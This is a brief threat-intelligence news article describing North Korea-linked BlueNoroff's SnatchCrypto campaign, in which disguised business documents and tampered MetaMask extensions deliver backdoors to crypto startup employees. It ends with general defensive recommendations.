North Korea-linked APT group BlueNoroff has been found targeting cryptocurrency startups with fake MetaMask browser extensions in a campaign dubbed SnatchCrypto.

What has happened?

SnatchCrypto is focused on different startup companies that deal with smart contracts and cryptocurrencies, DeFi, Blockchain, and the FinTech industry.
  • The start-ups usually receive letters or files from unfamiliar sources, such as venture companies sending them a contract or other files related to business, which the APT group is finding as an opportunity to exploit.
  • The campaign targeted the employees in crypto-related ventures and was sent a Windows backdoor with surveillance functions.
  • The backdoor is disguised as a contract or another business file to empty the crypto wallet of the victim.
  • So far, 15 venture businesses' brand/employee names have been abused in the SnatchCrypto campaign wherein criminals tampered with the Metamask Chrome extension.

Who are on the radar?

The attackers work around a complex infrastructure, including various exploits and malware implants to target a wide range of victims across Russia, Singapore, Slovenia, the Czech Republic, China, Poland, India, the U.S., Hong Kong, the UAE, Ukraine, and Vietnam.

The use of backdoor

As mentioned earlier, the attackers send startup employees a Windows backdoor disguised as a contract or another business file.
  • If the file is opened on a system connected to the internet, another macro-enabled document is downloaded to deploy malware.
  • This threat sends all basic information and a PowerShell agent to the attackers and creates a backdoor.
  • Subsequently, BlueNoroff deploys additional tools, such as a keylogger and screenshot taker for monitoring victims.
  • After weeks and months of tracking, the attackers find a target and use the stolen information to steal cryptocurrency.

A connection with the Lazarus group

BlueNoroff is associated with the Lazarus group and uses its sophisticated attack technologies and diversified structure. Moreover, the Lazarus group is known for attacking cryptocurrency startups.

Concluding notes

The attacks on cryptocurrency firms are growing and with each passing day, attackers formulate and showcase new tricks to lure their targets. Organizations, especially startups, are recommended to train their employees to be careful with sensitive data and emails. Moreover, it is advised to leverage threat intelligence to enable threat discovery and detection, investigation, and timely mitigation.
Cyware Publisher

Publisher

Cyware